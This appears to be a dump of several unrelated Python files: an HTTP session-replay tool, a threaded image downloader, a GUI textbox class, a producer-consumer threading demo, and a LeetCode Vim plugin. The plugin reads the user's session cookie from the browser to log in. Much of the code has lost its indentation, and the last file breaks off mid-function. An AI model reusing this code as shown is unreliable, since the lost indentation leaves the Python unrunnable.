elif method == 'POST':
r1 = request_session.request('POST', 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content
#print("len: {0} received {1}".format(responseHeaders['Content-Length'], responseContent))
elif method == 'HEAD':
r1 = request_session.request('HEAD', 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content
else: # EXPERIMENTAL
r1 = request_session.request(method, 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content
#gzip_file = gzip.GzipFile(fileobj=responseContent)
#shutil.copyfileobj(gzip_file, f)
expected = extractHeader.responseHeader_to_dict(resp.getHeaders())
# print("------------EXPECTED-----------")
# print(expected)
# print("------------RESP--------------")
# print(responseHeaders)
# print()
if mainProcess.verbose:
expected_output_split = resp.getHeaders().split('\r\n')[0].split(' ', 2)
expected_output = (int(expected_output_split[1]), str(expected_output_split[2]))
r = result.Result(session_filename, expected_output[0], r1.status_code, responseContent)
b_res, res = r.getResult(responseHeaders, expected, colorize=True)
print(res)
if not b_res:
print("Received response")
print(responseHeaders)
print("Expected response")
print(expected)
# result_queue.put(r)
except UnicodeEncodeError as e:
# these unicode errors are due to the interaction between Requests and our wiretrace data.
# TODO fix
print("UnicodeEncodeError exception")
except requests.exceptions.ContentDecodingError as e:
print("ContentDecodingError", e)
except:
e = sys.exc_info()
print("ERROR in NonSSLReplay: ", e, response, session_filename)
def session_replay(input, proxy, result_queue):
    ''' Replay all transactions in session
    This entire session will be replayed in one requests.Session (so one socket / TCP connection)'''
    global bSTOP
# if timing_control:
# time.sleep(float(session._timestamp)) # allow other threads to run
while bSTOP == False:
for session in iter(input.get, 'STOP'):
# print(bSTOP)
if session == 'STOP':
print("Queue is empty")
bSTOP = True
break
with requests.Session() as request_session:
request_session.proxies = proxy
for txn in session.getTransactionIter():
try:
txn_replay(session._filename, txn, proxy, result_queue, request_session)
except:
e = sys.exc_info()
print("ERROR in replaying: ", e, txn.getRequest().getHeaders())
bSTOP = True
#print("Queue is empty")
input.put('STOP')
break
def client_replay(input, proxy, result_queue, nThread):
Threads = []
for i in range(nThread):
t = Thread(target=session_replay, args=[input, proxy, result_queue])
t.start()
Threads.append(t)
for t1 in Threads:
t1.join()
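# --- Illustrative usage sketch (not part of the original script) ---
# A minimal, hedged example of one way client_replay() could be driven. It assumes
# the sessions have already been parsed elsewhere in this project (represented here
# by the hypothetical name `parsed_sessions`) and only shows the queue plumbing and
# the 'STOP' sentinel that session_replay() expects.
def example_drive_replay(parsed_sessions, result_queue, nThread=4):
    from multiprocessing import Queue
    session_queue = Queue()
    for parsed_session in parsed_sessions:
        session_queue.put(parsed_session)
    session_queue.put('STOP')  # sentinel: session_replay() re-inserts it before exiting
    proxy = {'http': 'http://127.0.0.1:8080'}  # assumed proxy address, adjust as needed
    client_replay(session_queue, proxy, result_queue, nThread)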
|
08_赠送.py
|
"""
pip3 install requests
"""
import threading
import requests
import uuid
url_list = [
'https://www3.autoimg.cn/newsdfs/g28/M05/F9/98/120x90_0_autohomecar__ChsEnluQmUmARAhAAAFES6mpmTM281.jpg',
'https://www2.autoimg.cn/newsdfs/g28/M09/FC/06/120x90_0_autohomecar__ChcCR1uQlD6AT4P3AAGRMJX7834274.jpg',
'https://www2.autoimg.cn/newsdfs/g3/M00/C6/A9/120x90_0_autohomecar__ChsEkVuPsdqAQz3zAAEYvWuAspI061.jpg',
]
def task(url):
    """
    1. DNS resolution: resolve the domain name to an IP address
    2. Create a client socket                  sk = socket.socket()
    3. Connect to the server                   sk.connect(...)
    4. Send the request (ask for the image)    sk.send(...)
    5. Receive the response                    sk.recv(8096)
       and write the received data to a file.
    """
ret = requests.get(url)
file_name = str(uuid.uuid4()) + '.jpg'
with open(file_name, mode='wb') as f:
f.write(ret.content)
for url in url_list:
t = threading.Thread(target=task, args=(url,))
t.start()
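# --- Illustrative sketch only (never called above) ---
# A hedged, minimal version of the same fetch done at the socket level, following the
# steps listed in task()'s docstring. It assumes a plain http:// host and path; the
# https:// URLs in url_list would additionally need TLS via the ssl module.
def fetch_with_raw_socket(host, path, out_name):
    import socket
    sk = socket.socket()                       # 2. create a TCP client socket
    sk.connect((host, 80))                     # 1./3. resolve the host name and connect
    request = 'GET {} HTTP/1.0\r\nHost: {}\r\n\r\n'.format(path, host)
    sk.sendall(request.encode('utf-8'))        # 4. send the request
    chunks = []
    while True:
        data = sk.recv(8096)                   # 5. receive the response
        if not data:
            break
        chunks.append(data)
    sk.close()
    # HTTP/1.0 responses are not chunk-encoded, so the body is everything after the headers
    body = b''.join(chunks).split(b'\r\n\r\n', 1)[-1]
    with open(out_name, mode='wb') as f:
        f.write(body)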
|
textbox.py
|
import copy
import time
from threading import Thread
from ..graphics import Color
from .component import Component
from .panel import Panel
from .label import Label
from .layout import Relative
class Textbox(Component):
"""@brief Box for users to type text into.
"""
def __init__(self, controller, num_chars: int=15, parent: Component=None, z: int=0):
Component.__init__(self, controller, parent, z)
# textbox specific details
self.num_chars = num_chars
self.typing = False
self.cursor_active = False
self.cursor_rate = 0.5
self.background = Color['white']
self.foreground = Color['black']
self.font = self.controller.font['large']
# textbox made with a panel
self.panel = Panel(self.controller, parent=self)
# typed text goes into the label
self.label = Label(self.controller, self.text, parent=self)
        # size the textbox to fit `num_chars` characters, using 'o' as the reference glyph
        self.width, self.height = self.font.size('o' * self.num_chars)
self.current_width = self.font.size(self.label.text)[0]
# have a flashing cursor
self.cursor_char = '|'
self.cursor_offset = 3
self.cursor_width = self.font.size(self.cursor_char)[0]
self.cursor_label = Label(self.controller, self.cursor_char)
self.cursor_label.visible = False
def load(self):
"""@brief Load all subcomponents of textbox.
"""
self.set_anchor()
# load panel
self.panel.anchor = self.anchor
self.panel.loc = self.loc
self.panel.background = self.background
self.panel.width = self.width
self.panel.height = self.height
self.panel.load()
# update the label with button's members
self.center_layout = Relative(self.panel)
self.label.loc = self.center_layout.northwest
self.label.text = self.text
self.label.font = self.font
self.label.foreground = self.foreground
self.label.background = None
self.label.load()
# keep the cursor on the far right of the text
w = self.label.font.size(self.label.text)[0]
self.cursor_label.loc = self.center_layout.northwest
cursor_x_offset = self.cursor_label.loc[0] + w - self.cursor_width / self.cursor_offset
self.cursor_label.loc = (cursor_x_offset, self.cursor_label.loc[1])
self.cursor_label.font = self.font
self.cursor_label.foreground = self.foreground
self.cursor_label.background = None
self.cursor_label.load()
def refresh_actions(self):
"""@brief Every frame, check if typing is occurring.
If it is, load text from the controller's keyboard,
and handle cursor flashing.
"""
# typing setup
if self.focused and not self.typing:
self.controller.keyboard.typing = True
self.typing = True
self.controller.keyboard.typed_text = copy.copy(self.text)
# when the user is typing
if self.focused and self.typing:
# determine if the width of the text is wider than textbox's width
new_width = self.font.size(self.controller.keyboard.typed_text)[0]
# remove the new character if there is no room left
if new_width > self.width:
self.controller.keyboard.typed_text = self.controller.keyboard.typed_text[:-1]
# update text because there is room
else:
self.text = copy.copy(self.controller.keyboard.typed_text)
self.current_width = self.font.size(self.text)[0]
self.load()
# start/stop typing
self.typing = self.focused
# setup cursor flashing
if self.typing and not self.cursor_active:
self.cursor_active = True
Thread(target=self.flash_cursor, daemon=True).start()
def draw(self):
"""@brief Refresh all subcomponents after typing has been checked.
"""
self.panel.refresh()
self.label.refresh()
self.cursor_label.refresh()
def flash_cursor(self):
"""@brief Running and close down of cursor flashing.
"""
while self.typing:
self.cursor_label.visible = not self.cursor_label.visible
time.sleep(self.cursor_rate)
# stop the cursor flashing when it should not be
if not self.controller.keyboard.typing:
self.focused = False
break
# reset the cursor state to be gone
self.cursor_active = False
self.cursor_label.visible = False
|
produtor_consumidor.py
|
from threading import Thread, Condition
from time import sleep
import random
from random import randint
import sys
import argparse
import string
import logging
# ---- #
logging.basicConfig(level=logging.DEBUG,
format='> %(threadName)-9s: %(message)s',)
# ---- #
parser = argparse.ArgumentParser(
    description="Model of the Producer-Consumer problem in Python")
parser.add_argument('-bs', dest="buffersize", metavar="Buffer Size", type=int, default=10,
                    help="Integer defining the buffer size. The default is 10.")
parser.add_argument('-pn', dest="producersnumber", metavar="Producer Number", type=int, default=1,
                    help="Integer defining the number of producer threads. The default is 1.")
parser.add_argument('-cn', dest="consumersnumber", metavar="Consumer Number", type=int, default=1,
                    help="Integer defining the number of consumer threads. The default is 1.")
parser.add_argument('-pr', dest="producingrate", metavar="Producing Rate", type=int, default=0,
                    help="Production rate of the producer threads, i.e. how many items each producer adds per round. The default is random.")
parser.add_argument('-pt', dest="producertime", metavar="Producer Time", type=int, default=1,
                    help="Integer defining the time (in seconds) between productions by the producer threads. The default is 1s.")
parser.add_argument('-ct', dest="consumertime", metavar="Consumer Time", type=int, default=2,
                    help="Integer defining the time (in seconds) between consumptions by the consumer threads. The default is 2s.")
parser.add_argument('-v', '--verbose', action="count", default=0,
                    help="Increase output verbosity.")
args = parser.parse_args()
# ---- #
buffer_size = args.buffersize
producer_number = args.producersnumber
consumer_number = args.consumersnumber
producing_rate = args.producingrate
producer_time = args.producertime
consumer_time = args.consumertime
verbosity = args.verbose
# ---- #
class Buffer:
def __init__(self, capacidade):
self.buffer = []
self.capacidade = capacidade
    def estoque(self):
        # current number of items held in the buffer
        return len(self.buffer)
def produz(self, itens):
if verbosity > 1:
            logging.debug(f'Adding {len(itens)} item(s) to the buffer...')
for i in range(len(itens)):
self.buffer.append(itens[i])
sleep(producer_time)
if verbosity:
            logging.debug(
                f'{len(itens)} item(s) added! | {itens} | Buffer stock: {self.estoque()}/{self.capacidade}')
else:
            logging.debug(
                f'{len(itens)} item(s) added! | Buffer stock: {self.estoque()}/{self.capacidade}')
sleep(producer_time)
def consome(self, item):
if verbosity > 1:
            logging.debug('Consuming an item from the buffer...')
self.buffer.remove(item)
sleep(consumer_time)
        logging.debug(
            f'Item {item} consumed! | Buffer stock: {self.estoque()}/{self.capacidade}')
sleep(consumer_time)
# ---- #
def produtor(bufr, mutx, itens_lst):
    logging.debug('Producer thread started...')
sleep(3)
while True:
mutx.acquire()
if bufr.estoque() < bufr.capacidade:
if verbosity > 1:
                logging.debug(
                    'Producing and making item(s) available...')
itens = []
quant = producing_rate
if quant == 0:
while True:
quant = randint(1, bufr.capacidade)
                    if bufr.estoque() + quant <= bufr.capacidade:  # <= allows exactly filling the buffer, avoiding an endless retry when only one slot is free
break
if not bufr.estoque() + quant > bufr.capacidade:
for x in range(quant):
itens.append(random.choice(itens_lst))
bufr.produz(itens)
else:
            logging.debug('Buffer full! Producer thread sleeping...')
mutx.wait()
if verbosity > 1:
            logging.debug('Notifying all consumers')
        mutx.notify_all()
mutx.release()
sleep(producer_time)
def consumidor(bufr, mutx):
    logging.debug('Consumer thread started...')
sleep(3)
while True:
mutx.acquire()
if bufr.estoque() == 0:
            logging.debug(
                'Buffer empty! Consumer thread sleeping / waiting for resources...')
mutx.wait()
else:
bufr.consome(random.choice(bufr.buffer))
if verbosity > 1:
            logging.debug('Notifying all producers')
        mutx.notify_all()
mutx.release()
sleep(consumer_time)
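# --- Illustrative sketch (not used by this program) ---
# A minimal, hedged example of the wait-with-predicate idiom usually recommended with
# threading.Condition: re-check the predicate in a `while` loop after wait() returns,
# because the shared state may have changed again between the notify and the wakeup.
# `shared_list` stands in for any shared buffer protected by `cond`.
def _condition_pattern_sketch(shared_list, cond):
    with cond:                        # acquire/release the condition's lock
        while len(shared_list) == 0:  # re-check the predicate after every wakeup
            cond.wait()
        item = shared_list.pop(0)     # consume one item while still holding the lock
        cond.notify_all()             # wake any producers waiting for free space
    return item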
# ---- #
if __name__ == "__main__":
print(".::Programa em Python que modela o problema Produtor-Consumidor::.")
if len(sys.argv) < 2:
print("- Este programa possui argumentos!")
print("- Para mais informações, execute: produtor_consumidor.py --help")
print()
print("Valores iniciais:")
print(f"\t> Número de Threads Produtoras: {producer_number}")
print(f"\t> Número de Threads Consumidoras: {consumer_number}")
print(
f"\t> Taxa de Produção: {producing_rate if producing_rate > 0 else 'Aleatório (entre 1 e a capacidade do buffer)'}")
print(f"\t> Delay das Threads Produtoras: {producer_time}")
print(f"\t> Delay das Threads Consumidoras: {consumer_time}")
print(f"\t> Nível verborrágico: {verbosity}")
print()
continuar = input('Continuar? [S/n]: ')
if continuar not in 'sS':
sys.exit()
print()
itens = list(string.ascii_uppercase)
buff = Buffer(buffer_size)
mutex = Condition()
producer_threads = []
consumer_threads = []
for prodn in range(producer_number):
thrdName = 'Produtor {} '.format(prodn+1)
producer_threads.append(
Thread(target=produtor, name=thrdName, args=(buff, mutex, itens)))
producer_threads[prodn].start()
sleep(2)
for consn in range(consumer_number):
thrdName = 'Consumidor {}'.format(consn+1)
consumer_threads.append(
Thread(target=consumidor, name=thrdName, args=(buff, mutex)))
consumer_threads[consn].start()
sleep(2)
    # Optional:
    # for p in range(producer_number):
    #     producer_threads[p].join()
    # for c in range(consumer_number):
    #     consumer_threads[c].join()
|
leetcode.py
|
import json
import logging
import re
import time
import os
import pickle
from threading import Semaphore, Thread, current_thread
try:
from bs4 import BeautifulSoup
import requests
inited = 1
except ImportError:
inited = 0
try:
import vim
except ImportError:
vim = None
try:
import browser_cookie3
except ImportError:
browser_cookie3 = None
try:
import keyring
except ImportError:
keyring = None
LC_BASE = os.environ['LEETCODE_BASE_URL']
LC_CSRF = LC_BASE + '/ensure_csrf/'
LC_LOGIN = LC_BASE + '/accounts/login/'
LC_GRAPHQL = LC_BASE + '/graphql'
LC_CATEGORY_PROBLEMS = LC_BASE + '/api/problems/{category}'
LC_PROBLEM = LC_BASE + '/problems/{slug}/description'
LC_TEST = LC_BASE + '/problems/{slug}/interpret_solution/'
LC_SUBMIT = LC_BASE + '/problems/{slug}/submit/'
LC_SUBMISSIONS = LC_BASE + '/api/submissions/{slug}'
LC_SUBMISSION = LC_BASE + '/submissions/detail/{submission}/'
LC_CHECK = LC_BASE + '/submissions/detail/{submission}/check/'
LC_PROBLEM_SET_ALL = LC_BASE + '/problemset/all/'
LC_PROGRESS_ALL = LC_BASE + '/api/progress/all/'
EMPTY_FREQUENCIES = [0, 0, 0, 0, 0, 0, 0, 0]
session = None
task_running = False
task_done = False
task_trigger = Semaphore(0)
task_name = ''
task_input = None
task_progress = ''
task_output = None
task_err = ''
log = logging.getLogger(__name__)
log.setLevel(logging.ERROR)
def enable_logging():
out_hdlr = logging.FileHandler('leetcode-vim.log')
out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
out_hdlr.setLevel(logging.INFO)
log.addHandler(out_hdlr)
log.setLevel(logging.INFO)
def _make_headers():
assert is_login()
headers = {'Origin': LC_BASE,
'Referer': LC_BASE,
'X-Requested-With': 'XMLHttpRequest',
'X-CSRFToken': session.cookies.get('csrftoken', '')}
return headers
def _level_to_name(level):
if level == 1:
return 'Easy'
if level == 2:
return 'Medium'
if level == 3:
return 'Hard'
return ' '
def _state_to_flag(state):
if state == 'ac':
return 'X'
if state == 'notac':
return '?'
return ' '
def _status_to_name(status):
if status == 10:
return 'Accepted'
if status == 11:
return 'Wrong Answer'
if status == 12:
return 'Memory Limit Exceeded'
if status == 13:
return 'Output Limit Exceeded'
if status == 14:
return 'Time Limit Exceeded'
if status == 15:
return 'Runtime Error'
if status == 16:
return 'Internal Error'
if status == 20:
return 'Compile Error'
if status == 21:
return 'Unknown Error'
return 'Unknown State'
def _break_code_lines(s):
return s.replace('\r\n', '\n').replace('\xa0', ' ').split('\n')
def _break_paragraph_lines(s):
lines = _break_code_lines(s)
result = []
# reserve one and only one empty line between two non-empty lines
for line in lines:
if line.strip() != '': # a line with only whitespaces is also empty
result.append(line)
result.append('')
return result
def _remove_description(code):
eod = code.find('[End of Description]')
if eod == -1:
return code
eol = code.find('\n', eod)
if eol == -1:
return ''
return code[eol+1:]
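# Hedged illustration of _remove_description(): everything up to and including the line
# that contains the "[End of Description]" marker is dropped, e.g.
#   _remove_description('# 1. Two Sum\n# [End of Description]\nclass Solution: ...')
#   returns 'class Solution: ...'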
def is_login():
return session and 'LEETCODE_SESSION' in session.cookies
def get_progress():
headers = _make_headers()
res = session.get(LC_PROGRESS_ALL, headers=headers)
if res.status_code != 200:
_echoerr('cannot get the progress')
return None
data = res.json()
if 'solvedTotal' not in data:
return None
return data
def load_session_cookie(browser):
if browser_cookie3 is None:
_echoerr('browser_cookie3 not installed: pip3 install browser_cookie3 --user')
return False
if keyring is None:
_echoerr('keyring not installed: pip3 install keyring --user')
return False
session_cookie_raw = keyring.get_password('leetcode.vim', 'SESSION_COOKIE')
if session_cookie_raw is None:
cookies = getattr(browser_cookie3, browser)(domain_name='leetcode.com')
for cookie in cookies:
if cookie.name == 'LEETCODE_SESSION':
session_cookie = cookie
session_cookie_raw = pickle.dumps(cookie, protocol=0).decode('utf-8')
break
else:
_echoerr('Leetcode session cookie not found. Please login in browser.')
return False
keyring.set_password('leetcode.vim', 'SESSION_COOKIE', session_cookie_raw)
else:
session_cookie = pickle.loads(session_cookie_raw.encode('utf-8'))
global session
session = requests.Session()
session.cookies.set_cookie(session_cookie)
progress = get_progress()
if progress is None:
_echoerr('cannot get progress. Please relogin in your browser.')
keyring.delete_password('leetcode.vim', 'SESSION_COOKIE')
return False
return True
def _get_category_problems(category):
headers = _make_headers()
url = LC_CATEGORY_PROBLEMS.format(category=category)
log.info('_get_category_problems request: url="%s" headers="%s"',
url, headers)
res = session.get(url, headers=headers)
log.info('_get_category_problems response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the category: {}'.format(category))
return []
problems = []
content = res.json()
for p in content['stat_status_pairs']:
# skip hidden questions
if p['stat']['question__hide']:
continue
problem = {'state': _state_to_flag(p['status']),
'id': p['stat']['question_id'],
'fid': p['stat']['frontend_question_id'],
'title': p['stat']['question__title'],
'slug': p['stat']['question__title_slug'],
'paid_only': p['paid_only'],
'ac_rate': p['stat']['total_acs'] / p['stat']['total_submitted'],
'level': _level_to_name(p['difficulty']['level']),
'favor': p['is_favor'],
'category': content['category_slug'],
'frequency': p['frequency']}
problems.append(problem)
return problems
def get_problems(categories):
assert is_login()
problems = []
for c in categories:
problems.extend(_get_category_problems(c))
return sorted(problems, key=lambda p: p['id'])
def _split(s):
if isinstance(s, list):
lines = []
for element in s:
lines.extend(_split(element))
return lines
# Replace all \r\n to \n and all \r (alone) to \n
s = s.replace('\r\n', '\n').replace('\r', '\n').replace('\0', '\n')
    # str.split has a disadvantage: ''.split('\n') results in [''], but what we want
# is []. This small function returns [] if `s` is a blank string, that is, containing no
# characters other than whitespaces.
if s.strip() == '':
return []
return s.split('\n')
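# Hedged illustration of _split(): it normalizes line endings and never returns [''], e.g.
#   _split('a\r\nb')      returns ['a', 'b']
#   _split('   ')         returns []
#   _split(['a\nb', ''])  returns ['a', 'b']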
def get_problem(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'query': '''query getQuestionDetail($titleSlug : String!) {
question(titleSlug: $titleSlug) {
questionId
title
content
stats
difficulty
codeDefinition
sampleTestCase
enableRunCode
translatedContent
}
}''',
'variables': {'titleSlug': slug},
'operationName': 'getQuestionDetail'}
log.info('get_problem request: url="%s" headers="%s" body="%s"', LC_GRAPHQL, headers, body)
res = session.post(LC_GRAPHQL, json=body, headers=headers)
log.info('get_problem response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the problem: {}'.format(slug))
return None
q = res.json()['data']['question']
content = q['translatedContent'] or q['content']
if content is None:
_echoerr('cannot get the problem: {}'.format(slug))
return None
soup = BeautifulSoup(content, features='html.parser')
problem = {}
problem['id'] = q['questionId']
problem['title'] = q['title']
problem['slug'] = slug
problem['level'] = q['difficulty']
problem['desc'] = _break_paragraph_lines(soup.get_text())
problem['templates'] = {}
for t in json.loads(q['codeDefinition']):
problem['templates'][t['value']] = _break_code_lines(t['defaultCode'])
problem['testable'] = q['enableRunCode']
problem['testcase'] = _split(q['sampleTestCase'])
stats = json.loads(q['stats'])
problem['total_accepted'] = stats['totalAccepted']
problem['total_submission'] = stats['totalSubmission']
problem['ac_rate'] = stats['acRate']
return problem
def _check_result(submission_id):
global task_progress
if _in_task():
prog_stage = 'Uploading '
prog_bar = '.'
task_progress = prog_stage + prog_bar
while True:
headers = _make_headers()
url = LC_CHECK.format(submission=submission_id)
log.info('check result request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('check result response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the execution result')
return None
if _in_task():
prog_bar += '.'
r = res.json()
if r['state'] == 'SUCCESS':
prog_stage = 'Done '
break
elif r['state'] == 'PENDING':
prog_stage = 'Pending '
elif r['state'] == 'STARTED':
prog_stage = 'Running '
if _in_task():
task_progress = prog_stage + prog_bar
time.sleep(1)
result = {
'answer': r.get('code_answer', []),
'runtime': r['status_runtime'],
'state': _status_to_name(r['status_code']),
'testcase': _split(r.get('input', r.get('last_testcase', ''))),
'passed': r.get('total_correct') or 0,
'total': r.get('total_testcases') or 0,
'error': _split([v for k, v in r.items() if 'error' in k and v])
}
# the keys differs between the result of testing the code and submitting it
# for submission judge_type is 'large', and for testing judge_type does not exist
if r.get('judge_type') == 'large':
result['answer'] = _split(r.get('code_output', ''))
result['expected_answer'] = _split(r.get('expected_output', ''))
result['stdout'] = _split(r.get('std_output', ''))
result['runtime_percentile'] = r.get('runtime_percentile', '')
else:
# Test states cannot distinguish accepted answers from wrong answers.
if result['state'] == 'Accepted':
result['state'] = 'Finished'
result['stdout'] = _split(r.get('code_output', []))
result['expected_answer'] = []
result['runtime_percentile'] = r.get('runtime_percentile', '')
result['expected_answer'] = r.get('expected_code_answer', [])
return result
def test_solution(problem_id, title, slug, filetype, code, test_input):
assert is_login()
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': test_input,
'lang': filetype,
'question_id': str(problem_id),
'test_mode': False,
'typed_code': code}
url = LC_TEST.format(slug=slug)
log.info('test solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('test solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot test the solution for ' + slug)
return None
result = _check_result(res.json()['interpret_id'])
result['testcase'] = test_input.split('\n')
result['title'] = title
return result
def test_solution_async(problem_id, title, slug, filetype, code, test_input):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
code = _remove_description(code)
task_name = 'test_solution'
task_input = [problem_id, title, slug, filetype, code, test_input]
task_trigger.release()
return True
def submit_solution(slug, filetype, code=None):
assert is_login()
problem = get_problem(slug)
if not problem:
return None
if code is None:
code = '\n'.join(vim.current.buffer)
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': problem['testcase'],
'lang': filetype,
'question_id': str(problem['id']),
'test_mode': False,
'typed_code': code,
'judge_type': 'large'}
url = LC_SUBMIT.format(slug=slug)
log.info('submit solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('submit solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot submit the solution for ' + slug)
return None
result = _check_result(res.json()['submission_id'])
result['title'] = problem['title']
return result
def submit_solution_async(slug, filetype, code=None):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
if code is None:
code = '\n'.join(vim.current.buffer)
task_name = 'submit_solution'
task_input = [slug, filetype, code]
task_trigger.release()
return True
def get_submissions(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
url = LC_SUBMISSIONS.format(slug=slug)
log.info('get submissions request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submissions response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submissions of problem: ' + slug)
return None
submissions = []
for r in res.json()['submissions_dump']:
s = {
'id': r['url'].split('/')[3],
'time': r['time'].replace('\xa0', ' '),
'status': r['status_display'],
'runtime': r['runtime'],
}
submissions.append(s)
return submissions
def _group1(match, default):
if match:
return match.group(1)
return default
def _unescape(s):
return s.encode().decode('unicode_escape')
def get_submission(sid):
assert is_login()
headers = _make_headers()
url = LC_SUBMISSION.format(submission=sid)
log.info('get submission request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submission response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submission: ' + sid)
return None
# we need to parse the data from the Javascript snippet
s = res.text
submission = {
'id': sid,
'state': _status_to_name(int(_group1(re.search(r"status_code: parseInt\('([^']*)'", s),
'not found'))),
'runtime': _group1(re.search("runtime: '([^']*)'", s), 'not found'),
'passed': _group1(re.search("total_correct : '([^']*)'", s), 'not found'),
'total': _group1(re.search("total_testcases : '([^']*)'", s), 'not found'),
'testcase': _split(_unescape(_group1(re.search("input : '([^']*)'", s), ''))),
'answer': _split(_unescape(_group1(re.search("code_output : '([^']*)'", s), ''))),
'expected_answer': _split(_unescape(_group1(re.search("expected_output : '([^']*)'", s),
''))),
'problem_id': _group1(re.search("questionId: '([^']*)'", s), 'not found'),
'slug': _group1(re.search("editCodeUrl: '([^']*)'", s), '///').split('/')[2],
'filetype': _group1(re.search("getLangDisplay: '([^']*)'", s), 'not found'),
'error': [],
'stdout': [],
}
problem = get_problem(submission['slug'])
submission['title'] = problem['title']
    # the punctuations and newlines in the code are escaped like '\\u000a' ('\\' => real backslash)
    # to unescape the string, we do the trick '\\u000a'.encode().decode('unicode_escape') ==> '\n'
# submission['code'] = _break_code_lines(_unescape(_group1(
# re.search("submissionCode: '([^']*)'", s), '')))
submission['code'] = _unescape_with_Chinese(
_group1(re.search("submissionCode: '([^']*)'", s), ''))
dist_str = _unescape(_group1(re.search("runtimeDistributionFormatted: '([^']*)'", s),
'{"distribution":[]}'))
dist = json.loads(dist_str)['distribution']
dist.reverse()
# the second key "runtime" is the runtime in milliseconds
# we need to search from the position after the first "runtime" key
prev_runtime = re.search("runtime: '([^']*)'", s)
if not prev_runtime:
my_runtime = 0
else:
my_runtime = int(_group1(re.search("runtime: '([^']*)'", s[prev_runtime.end():]), 0))
accum = 0
for runtime, frequency in dist:
accum += frequency
if my_runtime >= int(runtime):
break
submission['runtime_percentile'] = '{:.1f}%'.format(accum)
return submission
def _process_topic_element(topic):
return {'topic_name': topic.find(class_='text-gray').string.strip(),
'num_problems': topic.find(class_='badge').string,
'topic_slug': topic.get('href').split('/')[2]}
def _process_company_element(company):
return {'company_name': company.find(class_='text-gray').string.strip(),
'num_problems': company.find(class_='badge').string,
'company_slug': company.get('href').split('/')[2]}
def get_topics_and_companies():
headers = _make_headers()
    log.info('get_topics_and_companies request: url="%s"', LC_PROBLEM_SET_ALL)
res = session.get(LC_PROBLEM_SET_ALL, headers=headers)
log.info('get_topics_and_companies response: status="%s" body="%s"', res.status_code,
res.text)
if res.status_code != 200:
_echoerr('cannot get topics')
return []
soup = BeautifulSoup(res.text, features='html.parser')
topic_elements = soup.find_all(class_='sm-topic')
topics = [_process_topic_element(topic) for topic in topic_elements]
company_elements = soup.find_all(class_='sm-company')
companies = [_process_company_element(company) for company in company_elements]
return {
'topics': topics,
'companies': companies
}
def get_problems_of_topic(topic_slug):
request_body = {
'operationName':'getTopicTag',
'variables': {'slug': topic_slug},
'query': '''query getTopicTag($slug: String!) {
topicTag(slug: $slug) {
name
translatedName
questions {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
}
frequencies
}
}
'''}
headers = _make_headers()
log.info('get_problems_of_topic request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_topic response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the topic')
return {'topic_name': topic_slug, 'problems': []}
topic_tag = res.json()['data']['topicTag']
if not topic_tag:
return {'topic_name': topic_slug, 'problems': []}
if topic_tag['frequencies']:
id_to_frequency_map = json.loads(topic_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequency': id_to_frequency_map.get(p['questionId'], 0)}
return {
'topic_name': topic_tag['name'],
'problems': [process_problem(p) for p in topic_tag['questions']]}
def get_problems_of_company(company_slug):
request_body = {
'operationName':'getCompanyTag',
'variables': {'slug': company_slug},
'query': '''query getCompanyTag($slug: String!) {
companyTag(slug: $slug) {
name
translatedName
frequencies
questions {
...questionFields
}
}
}
fragment questionFields on QuestionNode {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
frequencyTimePeriod
}
'''}
headers = _make_headers()
headers['Referer'] = 'https://leetcode.com/company/{}/'.format(company_slug)
log.info('get_problems_of_company request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_company response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
